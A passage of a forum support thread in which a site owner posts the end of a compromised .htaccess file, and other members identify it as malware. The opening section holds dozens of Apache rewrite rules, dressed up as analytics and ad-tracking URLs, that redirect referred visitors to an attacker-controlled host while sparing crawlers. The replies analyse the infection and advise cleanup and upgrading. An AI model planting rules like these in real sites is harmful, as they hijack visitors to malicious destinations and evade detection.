[R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9594:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 24 RewriteRule ^.* http://%{ENV:RxJ}/imghover?iact=hm&ei=Y37qT_nlF8XqrQfKifW5BQ&q=sendal+jepit&tbs=isz:l&page=1&tbnh=137&tbnw=180&start=0&ndsp=19&dur=212&tbnid=mLLXvxm1wiqVkM:&hovh=137&hovw=180&vpx=780&vpy=229&imgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&imgrefurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ved=1t:1527,r:4,s:0,i:87&vetl=ms [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10371:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 25 RewriteRule ^.* http://%{ENV:RxJ}/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3197034&ns__t=1340611152531&ns_c=UTF-8&c8=&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10155:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 26 RewriteRule ^.* http://%{ENV:RxJ}/delivery/lg.php?bannerid=30629&campaignid=4402&zoneid=1661&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=3b091a8559 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11809:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 27 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=1&utmn=1804035787&utmhn=carapedia.com&utmcs=ISO-8859-1&utmsr=1024x768&utmvp=999x570&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=Pengertian\%20dan\%20Definisi\%20Komunikasi\%20Menurut\%20Para\%20Ahli\%20-\%20Definisi\%20-\%20CARApedia&utmhid=486000127&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/pengertian_definisi_komunikasi_menurut_para_ahli_info487.html&utmac=UA-29486227-1&utmcc=__utma\%3D89216009.586574778.1341458963.1341458963.1341458963.1\%3B\%2B__utmz\%3D89216009.1341458963.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dpengertian\%2520komunikasi\%3B&utmu=q~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9542:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 28 RewriteRule ^.* http://%{ENV:RxJ}/t.gif?_=1340153220991&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_0&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Ketika\%20Hubungan\%20Cinta\%20Ditentang\%20Orangtua\%20-\%20Yahoo!\%20She&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1334537201755728158908838 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9077:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 29 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.2.2&utms=1&utmn=2080894751&utmhn=www.songlyrics.com&utmcs=UTF-8&utmsr=1024x768&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r45&utmdt=YOU\%27LL\%20NEVER\%20WALK\%20ALONE\%20LYRICS\%20-\%20GERRY\%20AND\%20THE\%20PACEMAKERS&utmhid=808374168&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/gerry-and-the-pacemakers/you-ll-never-walk-alone-lyrics/&utmac=UA-235369-1&utmcc=__utma\%3D202431507.303908848.1341823896.1341823896.1341823896.1\%3B\%2B__utmz\%3D202431507.1341823896.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dyou\%2527ll\%2520never\%2520walk\%2520alone\%2520lyrics\%3B&utmu=q~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9125:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 30 RewriteRule ^.* http://%{ENV:RxJ}/t.gif?_=1340863107544&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_44&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Foto\%20Inggris\%20Raya\%20dari\%20Atas:\%20Kumpulan\%20foto\%20udara\%20terlangka\%20\%7C\%20Gambar\%20Inggris\%20Raya\%20dari\%20Atas:\%20Kumpulan\%20foto\%20udara\%20terlangka\%20-\%20Yahoo!\%20News\%20Indonesia&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&via=yahoo_id&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1334655638824679981279445 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11152:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 31 RewriteRule ^.* http://%{ENV:RxJ}/b?c1=2&c2=8443234&ns__t=1341642497177&ns_c=UTF-8&c8=detikNews\%20:\%20Budi\%2C\%20Pembunuh\%20Penjual\%20Siomay\%20Ngetop\%20Menyesal&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9623:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 32 RewriteRule ^.* http://%{ENV:RxJ}/new2/www/delivery/lg.php?bannerid=10577&campaignid=3303&zoneid=869&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=5871bfceea [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10321:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 33 RewriteRule ^.* http://%{ENV:RxJ}/p?s=792600102&t=c85bb4ca6eb849459a2bebc449c8bf22&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&fl_ev=0&lang=en&intl=us [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10184:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 34 RewriteRule ^.* http://%{ENV:RxJ}/b/ss/cnetasiacom2011/1/H.22.1/s33571437900338?AQB=1&ndh=1&t=28/5/2012\%2011:18:20\%204\%20-420&ce=UTF-8&ns=cnetasiapacific&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=USD&ch=search&server=asia.cnet.com&events=event2\%2Cevent36&c1=search&v1=search&c2=\%26quot\%3Blg\%26quot\%3B\%20articles&v3=search&v8=lg&v9=1&v11=NO_DIMENSION&c15=lg&c16=NO_DIMENSION&v38=New&v40=\%26quot\%3Blg\%26quot\%3B\%20articles&c45=New&c49=D\%3DUser-Agent&v49=D\%3DUser-Agent&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=1024&bh=585&p=2007\%20Microsoft\%20Office\%20system\%3BAdobe\%20Acrobat\%3BGoogle\%20Update\%3BShockwave\%20Flash\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&pid=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&oid=Search&oidt=3&ot=SUBMIT&AQE=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10244:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 35 RewriteRule ^.* http://%{ENV:RxJ}/ja/a/hb/i/sg/adv/infinity/infinity_local_backfill_reordered_favicon.html?rnd=260439&ysm_rd=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_cm=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_ss=&ysm_ss_tag=&ysm_hs=&ysm_max_ads=6&ysm_ads_per_page=3&ysm_scroll_delay=10000&ysm_landing_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_width=300&ysm_height=250&ysm_css=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_backup_gif=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ysm_mkt=id [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11360:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 36 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=1&utmn=984898211&utmhn=elib.unikom.ac.id&utmcs=ISO-8859-1&utmsr=1024x768&utmvp=1024x638&utmsc=16-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Digital\%20library\%20-\%20Perpustakaan\%20Pusat\%20Unikom\%20-\%20Knowledge\%20Center\%20-\%20WELCOME&utmhid=293400370&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/gdl.php\%3Fmod\%3Dbrowse\%26op\%3Dread\%26id\%3Djbptunikompp-gdl-serlipurna-25028&utmac=UA-12125208-1&utmcc=__utma\%3D34572917.29223417.1341385583.1341385583.1341385583.1\%3B\%2B__utmz\%3D34572917.1341385583.1.1.utmcsr\%3Dgaruda.dikti.go.id\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/jurnal/detil/id/0:374733/q/jurnal\%2520akuntansi\%2520kpr/offset/0/limit/15\%3B&utmu=D~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11303:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 37 RewriteRule ^.* http://%{ENV:RxJ}/tracker?event=media_connect_error&source=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&video_duration=239&domain=videocloud&playlist=1521712908001&video=1501416059001&platform=as3&time=1340354051203&errorCode=NetStream.Play.StreamNotFound&flash_version=WIN\%2010\%2C1\%2C102\%2C64&embed=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&mediaURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&account=89804535001&player_name=Direct\%20Lyrics\%20Sidebar\%20Playlist\%20Player(TEMP)&player=1522730664001&video_name=Taylor\%20Swift\%20Music\%20Video\%20For\%20The\%20Hunger\%20Games [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10381:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 38 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=17&utmn=1334633242&utmhn=siva-id.jobstreet.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x615&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=SiVA\%20\%C2\%A9JobStreet.com&utmhid=1096665459&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/applications/viewJobFolder.asp\%3FASC\%3D100000\%26JID\%3D840728908612398634\%257C542818\%26PF\%3DFalse\%26JGID\%3D0&utmac=UA-226014-6&utmcc=__utma\%3D1.698288290.1334714014.1342075935.1342147828.129\%3B\%2B__utmz\%3D1.1342068048.127.26.utmcsr\%3Dsiva-id.jobstreet.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/applications/viewJobFolder.asp\%3B&utmu=qh~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11642:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 39 RewriteRule ^.* http://%{ENV:RxJ}/delivery/lg.php?bannerid=1594&campaignid=731&zoneid=502&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=52f1e03680 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10571:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 40 RewriteRule ^.* http://%{ENV:RxJ}/new2/www/delivery/ajs.php?zoneid=949&cb=16511432836&charset=UTF-8&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&mmm_fo=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9940:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 41 RewriteRule ^.* http://%{ENV:RxJ}/getSegment.php?purl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&jsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rnd=1342147792093 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10578:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 42 RewriteRule ^.* http://%{ENV:RxJ}/st?_PVID=eUdQ0GoKp3F_xIGiTQ77SwCiyokXaE_1CnEABOM3&cnt=yan&ad_type=iframe&ad_size=180x150&entity=24276&site_code=mail§ion_code=15167784&cb=1341459057395561&yud=zip\%3D\%26ycg\%3Df\%26yyob\%3D1980&pub_redirect_unencoded=1&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9770:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 43 RewriteRule ^.* http://%{ENV:RxJ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-7603&sessionID=1340974602004.30392&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/anatolia_story/v02/c006/9.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.ESy8goEc&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/anatolia_story/v02/c006/8.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Anatolia\%20Story\%206\%20-\%20Read\%20Anatolia\%20Story\%20Chapter\%206\%20Online\%20-\%20Page\%209&ts1340974602006.0= [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9802:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 44 RewriteRule ^.* http://%{ENV:RxJ}/t.gif?_=1342084781951&count=horizontal&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter-widget-0&lang=en&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&size=m&text=Baju-Jaket-Wanita-GBA-2821&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1340771580973652408035798 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9662:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 45 RewriteRule ^.* http://%{ENV:RxJ}/pixel;r=969234004;a=p-94WKwgUwZHlfo;fpan=0;fpa=P0-605019385-1340784299337;ns=1;ce=1;je=0;sr=1024x768x24;enc=n;dst=0;et=1340785057120;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9583:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 46 RewriteRule ^.* http://%{ENV:RxJ}/b/ss/ahmhondacomprod/0/FAS-1.3/s19710726174525?[AQB]&ndh=1&t=19/5/2012\%2010:28:29\%202\%20\%2D420&ce=UTF\%2D8&ns=honda&pageName=PORTAL\%20HOME&cc=USD&ch=PORTAL&events=event1&v1=ACURA\%27S\%20GAME\%20DAY\%20AD\%0D\%0A\%20BANNER&c26=HOME&v26=HOME&c27=DEFAULT&v27=DEFAULT&c37=PORTAL:HOME:DEFAULT:PORTAL\%20HOME&pe=lnk_o&pev1=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pev2=PORTAL:HOME:DEFAULT:ACURA\%27S\%20GAME\%20DAY\%20AD\%0D\%0A\%20BANNER\%20DISPLAY&s=1280x768&[AEQ]? [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11003:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 47 RewriteRule ^.* http://%{ENV:RxJ}/event.js?thread_slug=earnings_per_share_eps_definition_investopedia&user_type=anon&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&theme=next&prev_imp=1342497224287170481&event=init_embed&thread=724651006&forum=investopedia&forum_id=1437076&imp=1342497224287170481 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9865:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 48 RewriteRule ^.* http://%{ENV:RxJ}/pixel;r=1536472089;a=p-f8Bn5MbvAQbXQ;fpan=0;fpa=P0-488374990-1322789151206;ns=0;ce=1;je=0;sr=1280x720x24;enc=n;dst=0;et=1340601528790;tzo=-420;ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11719:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 49 RewriteRule ^.* http://%{ENV:RxJ}/b?c1=7&c2=8097938&rn=1891219306&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=8097938&c8=ShareThis\%20Segmenter&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=2.2&cs=js [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9785:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 50 RewriteRule ^.* http://%{ENV:RxJ}/b/ss/aa-airasia-id-prd,aa-airasia-global/1/H.24.1/s25014632332923?AQB=1&ndh=1&t=9/6/2012\%2013:17:2\%201\%20-420&ce=UTF-8&ns=airasia&cdp=2&pageName=Select&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=IDR&server=booking.airasia.com&events=event2\%2Cevent1&products=\%3BJOG-CGK&c1=booking.airasia.com&v6=Monday&v7=3:00PM&v11=OW&v12=JOG&v13=CGK&v14=JOG-CGK&v26=Select&s=1024x768&c=24&j=1.7&v=N&k=Y&bw=1024&bh=580&p=Google\%20Update\%3BShockwave\%20Flash\%3BGoogle\%20Earth\%20Plugin\%3BAdobe\%20Acrobat\%3BMicrosoft\%C2\%AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3BMicrosoft\%20Office\%202003\%3B&pid=www.airasia.com:id:en:home.page&pidt=1&oid=functiononclick(event)\%7Breturnvalidate(this)\%3B\%7D&oidt=2&ot=SUBMIT&AQE=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10161:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 51 RewriteRule ^.* http://%{ENV:RxJ}/b?c1=7&c2=8097938&rn=691025660&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c3=8097938&c8=ShareThis\%20Segmenter&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cv=2.2&cs=js [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9715:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 52 RewriteRule ^.* http://%{ENV:RxJ}/t.gif?_=1340760579072&count=none&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_52&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Foto\%20Kue\%20Ulang\%20Tahun\%20Seleb\%20Hollywood\%20\%7C\%20Gambar\%20Kue\%20Ulang\%20Tahun\%20Seleb\%20Hollywood\%20-\%20Yahoo!\%20OMG!\%20Indonesia&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid=v3:1334808221852303953932758 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10912:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 53 RewriteRule ^.* http://%{ENV:RxJ}/st?_PVID=kVIJx2oKp3GqabgRUAEDyQAoyokXaFABBIYABEO5&cnt=yan&ad_type=iframe&ad_size=180x150&entity=24276&site_code=mail§ion_code=15167784&cb=1342243974337748&yud=zip\%3D\%26ycg\%3Df\%26yyob\%3D1993&pub_redirect_unencoded=1&pub_redirect=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9726:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 54 RewriteRule ^.* http://%{ENV:RxJ}/b/ss/intelcorp,intelcorpsupp/1/H.20.3/s75583734600977?AQB=1&ndh=1&t=4/1/2008\%2010:2:35\%201\%20-60&ce=UTF-8&pageName=supp:\%20support/chipsets/index.htm&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=USD&ch=supp&events=event5&c1=sites&h1=supp\%7Csites\%7Cchipsets\%7Cunassigned\%7C/support/chipsets/index.htm&c2=chipsets&c3=unassigned&v3=supp:\%20support/chipsets/index.htm&c4=unassigned&v4=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c5=unassigned&v6=sites&c7=intelcorpsupp&v7=chipsets&c8=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&v8=unassigned&c9=\%7B97dd2b39-5041-6fd2-2368-510f6dbb7dd9\%7D&c13=Version\%204.4&c14=supp:\%20support/chipsets/index.htm&c16=Less\%20than\%201\%20day&v16=Less\%20than\%201\%20day&c17=repeat&v17=repeat&s=1280x1024&c=32&j=1.7&v=N&k=Y&bw=1280&bh=832&p=Mozilla\%20Default\%20Plug-in\%3BAdobe\%20Acrobat\%3BShockwave\%20Flash\%3BMicrosoft\%u00AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11200:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 55 RewriteRule ^.* http://%{ENV:RxJ}/t.gif?_=1341803168756&count=none&counturl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&id=twitter_tweet_button_24&lang=id&original_referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&text=Foto\%20Regina\%20Ivanova\%20Raih\%20Gelar\%20Indonesian\%20Idol\%202012\%20\%7C\%20Gambar\%20Regina\%20Ivanova\%20Raih\%20Gelar\%20Indonesian\%20Idol\%202012\%20-\%20Yahoo!\%20OMG!\%20Indonesia&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&type=share&size=m&twttr_referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&twttr_widget=1&twttr_hask=1&twttr_li=0&twttr_pid=v3:1334566952486375619454354 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10648:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 56 RewriteRule ^.* http://%{ENV:RxJ}/s?volume=65.2014652014652&tpmt=27&hbd=4263858&ns=yt&len=42.792&hbt=221.394&ad_event=3&cfps=0&allowed=2_1,2_3&sdetail=n:1\%2Cf:fvwrel\%2Crv:T-gdEuW2vkk&screenw=1024&fmt=34&screenh=768&ptk=HARLEMworld197\%2Buser&playerw=640&h=360&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&playerh=390&erc=1&feature=fvwrel&pd=2.999&cid=1802321&rt=210.990&fvid=g6ysaoe-_pM&mos=0&sst=0&plid=AATD1vmhfzPNjX4_&fs=0&sourceid=yw&scoville=1&at=2_3&et=28.478&st=22.43&sendtmp=1&fexp=920704,921602,901700,913542,907335,922600,919306,924700,914030,907344,907217,920706,924500,902518,919324,906043,919316,912706&bd=608146&w=480&nbe=1&bt=40.110&sidx=0&mt=0&cr=ID&bc=3159757&md=1&csipt=watch5ad&docid=U8ykjDJzjF0&hl=en_US&vtmp=1&ad_flags=0&vid=Dt7x356SANpp6pHxvDgx0IBCzt9RNQE4C&hasstoryboard=1&vq=auto&lact=29552&sd=B6F5EF805HH1341227986617477&art=1.375&slots=sst~0;sidx~0;at~2_3&el=detailpage [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9287:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 57 RewriteRule ^.* http://%{ENV:RxJ}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/mishounen_produce/v01/c003/43.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9872:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 58 RewriteRule ^.* http://%{ENV:RxJ}/jg-ads-new/www/delivery/ajs.php?zoneid=36&cb=Prejudice\%20Won\%E2\%80\%99t\%20Stop\%20Fight\%20for\%20Gay\%20Rights&charset=UTF-8&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&mmm_fo=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10981:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 59 RewriteRule ^.* http://%{ENV:RxJ}/plogger/?rand=1341286481719&ag=0&dir=0&fla=0&gears=0&java=0&realp=0&pdf=0&qt=0&wma=0&cookie=1&h=12&m=12&s=12&idsite=nationalgeographic.com&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&urlref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&date=Tue+Jul+03+2012+10:34:41+GMT\%2B0700+(SE+Asia+Standard+Time)&res=1024x768&data=\%7B\%22parsely_uuid\%22:\%2240EAE365-079F-44F3-B773-6D7BEE9D4079\%22\%2C\%22metadata\%22:\%7B\%7D\%2C\%22settings\%22:\%7B\%22debug\%22:false\%2C\%22widget\%22:false\%2C\%22tracker\%22:true\%7D\%7D&action_name=Nature+and+Landscapes+\%E2\%80\%93+Photo+Tips+\%E2\%80\%93+National+Geographic&action=pageview [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11748:/:0:HttpOnly] </IfModule> #7e19000a114b79c19014e1f1da1e30b278af87ca0fd2a0fd974176e3 coastguards24-7.co.uk is the new url, the old one is lifeboats24-7.co.uk
Makoto Posted October 17, 2015 Posted October 17, 2015 That .htaccess file gives me the impression that your forum has been compromised. Which, being that your running such an old version of IP.Board, would not really come as a surprise. Have you not noticed any issues with strange redirects before now..? Or any other problems of the nature?
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 We did have some security warnings on the old site from browsers but that has disappeared. I've copied the .htaccess file to the public_html directory and I think I'm running. Difficult to tell as the site still looks like the old one! I'm going to try and change the license over to mine and try an update, customer service suggested I go to 3.4.8, does this sound sensible?
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 It was going well. I tried to install my new license and I get an error, Quote There was an error contacting the license server, please try again later Is it worth trying the update and then see if this works?
Makoto Posted October 17, 2015 Posted October 17, 2015 Oh, that's crafty. After taking the time to study this more, I see how this works. Your site has indeed been compromised, your .htaccess file is completely malicious. It's a subtle infection that seems to only redirect users that try to access your site when being referred by social media links or search results on Google. So you wouldn't notice it when browsing your forum normally. It also intentionally avoids redirecting web crawlers so they wouldn't see the infection and continue to crawl your website normally. It's likely that other areas of your forum may be compromised as well. You will probably have some work ahead of you getting your forum cleaned up first before upgrading. IPS may be able to help you with this, but you'll have to write a support ticket and ask to see. Send them a link to this thread so they can see the problem in question. Upgrading to 3.4.8 as a start should be fine after your confident everything has been cleaned up. Once 4.1 has been released and had a bit of time to mature, you may want to look into upgrading again.
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 Some of the current site is off-limits to search engines and direct access from them (some parts of the forum are members only), could this be what you're seeing?
Makoto Posted October 17, 2015 Posted October 17, 2015 No. Just by looking at your .htaccess file I can tell that your forum has definitely been compromised. Going so long without updating can end up leaving your forum open to a world of security vulnerabilities. I would strongly recommend opening a support ticket and referencing this thread so IPS can look into the issue for you. If it ends up being outside of IPS' scope of support (since you are running an unsupported version of IPB), I would be more than happy to help you personally (including cleaning your forum from infection and upgrading you to 3.4.8), but I would have to charge an hourly rate for those services. If you're interested in that, you can send me a personal message (but again, I recommend contacting IPS support first).
Flitterkill Posted October 17, 2015 Posted October 17, 2015 What he said. Just look over the file you posted, ignoring everything else other than things that look like websites (.com, etc.) A lot going on there, none of it good.
AndyF Posted October 17, 2015 Posted October 17, 2015 While you are there is there anything odd in conf_global as well ? (Do not post all the file, or at least do not post the db credentials)
Rhett Posted October 17, 2015 Posted October 17, 2015 Rename that .htaccess to .old file and start with a clean new one, then once the site is up and running as normal, you can add back your bot blocking info if needed, however it's better to use group permissions and robots.txt file for blocking/controlling bots and guest access normally. As mentioned above it's been compromised though.  Â
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 OK thanks, how do I start with a clean .htaccess file? And is there a guide to setting up bot blocking? Forum access is already set up through group permissions so that should be OK as is.
